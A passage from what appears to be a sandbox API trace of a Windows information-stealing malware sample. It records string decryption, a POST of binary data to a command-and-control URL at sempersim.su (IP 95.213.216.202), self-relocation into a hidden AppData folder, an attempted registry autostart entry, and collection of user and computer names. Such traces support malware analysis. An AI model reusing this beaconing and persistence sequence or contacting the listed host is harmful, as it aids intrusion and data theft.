nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fb68 | out: pSid=0x19fb68*=0x63eaa8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0067.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.760] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x63eaa8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fb6c | out: IsMember=0x19fb6c) returned 1 [0067.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.762] GetNativeSystemInfo (in: lpSystemInfo=0x19fb44 | out: lpSystemInfo=0x19fb44*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0067.762] GetProcessHeap () returned 0x620000 [0067.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643488 [0067.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.763] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0067.786] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.786] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x63cc48) returned 1 [0067.803] GetProcessHeap () returned 0x620000 [0067.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6392a8 [0067.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.804] CryptImportKey (in: hProv=0x63cc48, pbData=0x6392a8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x62d710) returned 1 [0067.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.806] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0067.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.808] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0067.808] GetProcessHeap () returned 0x620000 [0067.808] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6392a8 | out: hHeap=0x620000) returned 1 [0067.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.810] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19f974 | out: pbData=0x643488, pdwDataLen=0x19f974) returned 1 [0067.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.836] CryptDestroyKey (hKey=0x62d710) returned 1 [0067.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.837] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0067.837] GetProcessHeap () returned 0x620000 [0067.837] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x63d420 [0067.837] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.837] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0067.838] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.838] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0067.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.839] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0067.839] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.840] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0067.840] GetProcessHeap () returned 0x620000 [0067.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633160 [0067.840] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x0) returned 11001 [0067.845] GetProcessHeap () returned 0x620000 [0067.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633160 | out: hHeap=0x620000) returned 1 [0067.846] GetProcessHeap () returned 0x620000 [0067.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0067.846] GetProcessHeap () returned 0x620000 [0067.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0067.846] GetProcessHeap () returned 0x620000 [0067.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0067.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.847] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f920*=0x0) returned 1 [0067.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.852] CryptAcquireContextW (in: phProv=0x19f920, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f920*=0x63cc48) returned 1 [0067.857] GetProcessHeap () returned 0x620000 [0067.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0067.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.858] CryptImportKey (in: hProv=0x63cc48, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f924 | out: phKey=0x19f924*=0x62d190) returned 1 [0067.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.859] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19f91c*=0x1, dwFlags=0x0) returned 1 [0067.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.859] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0067.859] GetProcessHeap () returned 0x620000 [0067.860] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0067.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.861] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643368, pdwDataLen=0x19f974 | out: pbData=0x643368, pdwDataLen=0x19f974) returned 1 [0067.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.861] CryptDestroyKey (hKey=0x62d190) returned 1 [0067.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0067.866] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0067.866] GetProcessHeap () returned 0x620000 [0067.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x63d420 [0067.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.867] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0067.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.868] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0067.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0067.869] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0067.869] GetProcessHeap () returned 0x620000 [0067.869] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633160 [0067.869] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19f930*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f950 | out: ppResult=0x19f950*=0x633200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea30*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0067.873] GetProcessHeap () returned 0x620000 [0067.873] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0067.873] socket (af=2, type=1, protocol=6) returned 0x264 [0067.873] connect (s=0x264, name=0x63ea30*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0067.942] FreeAddrInfoW (pAddrInfo=0x633200*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea30*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0067.942] GetProcessHeap () returned 0x620000 [0067.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63cc48 [0067.942] GetProcessHeap () returned 0x620000 [0067.942] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0067.942] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.943] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f958 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0067.943] GetProcessHeap () returned 0x620000 [0067.943] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63a7d8 [0067.943] GetProcessHeap () returned 0x620000 [0067.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0067.944] GetProcessHeap () returned 0x620000 [0067.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643200 [0067.944] GetProcessHeap () returned 0x620000 [0067.944] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0067.944] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0067.945] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f958 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 186\r\nConnection: close\r\n\r\n") returned 237 [0067.945] GetProcessHeap () returned 0x620000 [0067.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x641e78 [0067.945] GetProcessHeap () returned 0x620000 [0067.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0067.946] send (s=0x264, buf=0x641e78*, len=237, flags=0) returned 237 [0067.946] send (s=0x264, buf=0x63b6b0*, len=186, flags=0) returned 186 [0067.946] GetProcessHeap () returned 0x620000 [0067.946] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0067.946] recv (in: s=0x264, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 229 [0069.548] GetProcessHeap () returned 0x620000 [0069.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x641e78 | out: hHeap=0x620000) returned 1 [0069.549] GetProcessHeap () returned 0x620000 [0069.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0069.549] GetProcessHeap () returned 0x620000 [0069.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a7d8 | out: hHeap=0x620000) returned 1 [0069.550] GetProcessHeap () returned 0x620000 [0069.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63cc48 | out: hHeap=0x620000) returned 1 [0069.550] closesocket (s=0x264) returned 0 [0069.551] GetProcessHeap () returned 0x620000 [0069.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0069.551] GetProcessHeap () returned 0x620000 [0069.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d420 | out: hHeap=0x620000) returned 1 [0069.552] GetProcessHeap () returned 0x620000 [0069.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643368 | out: hHeap=0x620000) returned 1 [0069.552] GetProcessHeap () returned 0x620000 [0069.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633160 | out: hHeap=0x620000) returned 1 [0069.552] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6b0 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ea60 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635178 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ea00 | out: hHeap=0x620000) returned 1 [0069.553] GetProcessHeap () returned 0x620000 [0069.553] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x63d420 [0069.554] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x63d420, nSize=0x103 | out: lpFilename="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe")) returned 0x33 [0069.554] GetProcessHeap () returned 0x620000 [0069.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6427b8 [0069.555] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0069.555] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6427b8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0069.555] GetProcessHeap () returned 0x620000 [0069.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f58) returned 0x644560 [0069.556] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.557] wvsprintfW (in: param_1=0x644560, param_2="%s\\%s\\%s.exe", arglist=0x19fd44 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0069.557] GetProcessHeap () returned 0x620000 [0069.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6377a0 [0069.557] GetProcessHeap () returned 0x620000 [0069.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.558] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0069.558] StrStrW (lpFirst="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 0x0 [0069.559] GetProcessHeap () returned 0x620000 [0069.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x644560 [0069.559] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.560] wvsprintfW (in: param_1=0x644560, param_2="%s\\%s", arglist=0x19fd60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0069.560] GetProcessHeap () returned 0x620000 [0069.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x63d910 [0069.560] GetProcessHeap () returned 0x620000 [0069.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.561] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0069.562] MoveFileExW (lpExistingFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\rvtzlpyrgs.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\rvtzlpyrgs.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9\\9bdc8a.exe"), dwFlags=0x1) returned 1 [0069.563] GetProcessHeap () returned 0x620000 [0069.563] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6421e0 [0069.566] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75960000 [0069.566] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x6421e0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0069.566] GetProcessHeap () returned 0x620000 [0069.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f4a) returned 0x644560 [0069.567] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.567] wvsprintfW (in: param_1=0x644560, param_2="%s\\%s", arglist=0x19fb48 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9") returned 44 [0069.568] GetProcessHeap () returned 0x620000 [0069.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5c) returned 0x6429c8 [0069.568] GetProcessHeap () returned 0x620000 [0069.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.569] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\9edde9")) returned 0x10 [0069.569] GetProcessHeap () returned 0x620000 [0069.569] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3f50) returned 0x644560 [0069.569] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0069.570] wvsprintfW (in: param_1=0x644560, param_2="%s\\%s.%s", arglist=0x19fb5c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe") returned 55 [0069.570] GetProcessHeap () returned 0x620000 [0069.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x72) returned 0x6373a0 [0069.570] GetProcessHeap () returned 0x620000 [0069.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0069.571] GetProcessHeap () returned 0x620000 [0069.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6429c8 | out: hHeap=0x620000) returned 1 [0069.571] GetProcessHeap () returned 0x620000 [0069.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6421e0 | out: hHeap=0x620000) returned 1 [0069.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.572] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fd04 | out: pSid=0x19fd04*=0x63eb68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0069.573] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.573] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x63eb68*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fd08 | out: IsMember=0x19fd08) returned 1 [0069.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.574] GetProcessHeap () returned 0x620000 [0069.574] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x6429c8 [0069.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.575] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fc94*=0x0) returned 1 [0069.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.610] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fc94*=0x63cc48) returned 1 [0069.650] GetProcessHeap () returned 0x620000 [0069.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6392d8 [0069.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.651] CryptImportKey (in: hProv=0x63cc48, pbData=0x6392d8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fc98 | out: phKey=0x19fc98*=0x62d190) returned 1 [0069.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.652] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fc90*=0x1, dwFlags=0x0) returned 1 [0069.653] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.653] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0069.653] GetProcessHeap () returned 0x620000 [0069.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6392d8 | out: hHeap=0x620000) returned 1 [0069.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.655] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6429c8, pdwDataLen=0x19fce8 | out: pbData=0x6429c8, pdwDataLen=0x19fce8) returned 1 [0069.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.656] CryptDestroyKey (hKey=0x62d190) returned 1 [0069.656] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.657] CryptReleaseContext (hProv=0x63cc48, dwFlags=0x0) returned 1 [0069.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6429c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 28 [0069.658] GetProcessHeap () returned 0x620000 [0069.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x38) returned 0x62d710 [0069.658] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6429c8, cbMultiByte=-1, lpWideCharStr=0x62d710, cchWideChar=28 | out: lpWideCharStr="������Ќ��������ь�И���Й��я��") returned 28 [0069.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0069.659] SHRegSetPathW (hKey=0x80000002, pcszSubKey="������Ќ��������ь�И���Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x57 [0069.660] GetProcessHeap () returned 0x620000 [0069.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x62d710 | out: hHeap=0x620000) returned 1 [0069.661] GetProcessHeap () returned 0x620000 [0069.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6429c8 | out: hHeap=0x620000) returned 1 [0069.661] GetProcessHeap () returned 0x620000 [0069.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6373a0 | out: hHeap=0x620000) returned 1 [0069.662] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0069.663] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0069.664] GetProcessHeap () returned 0x620000 [0069.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d910 | out: hHeap=0x620000) returned 1 [0069.664] GetProcessHeap () returned 0x620000 [0069.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6377a0 | out: hHeap=0x620000) returned 1 [0069.665] GetProcessHeap () returned 0x620000 [0069.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6427b8 | out: hHeap=0x620000) returned 1 [0069.665] GetProcessHeap () returned 0x620000 [0069.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2bc) returned 0x6421e0 [0069.666] GetProcessHeap () returned 0x620000 [0069.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x63eb68 [0069.666] GetProcessHeap () returned 0x620000 [0069.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11c) returned 0x63a6e0 [0069.666] RtlGetVersion (in: lpVersionInformation=0x63a6e0 | out: lpVersionInformation=0x63a6e0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0069.666] GetProcessHeap () returned 0x620000 [0069.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a6e0 | out: hHeap=0x620000) returned 1 [0069.667] GetProcessHeap () returned 0x620000 [0069.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6424a8 [0069.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0069.668] GetUserNameW (in: lpBuffer=0x6424a8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0069.670] GetProcessHeap () returned 0x620000 [0069.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6424a8 | out: hHeap=0x620000) returned 1 [0069.670] GetProcessHeap () returned 0x620000 [0069.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x208) returned 0x6424a8 [0069.671] GetComputerNameW (in: lpBuffer=0x6424a8, nSize=0x19fed0 | out: lpBuffer="XC64ZB", 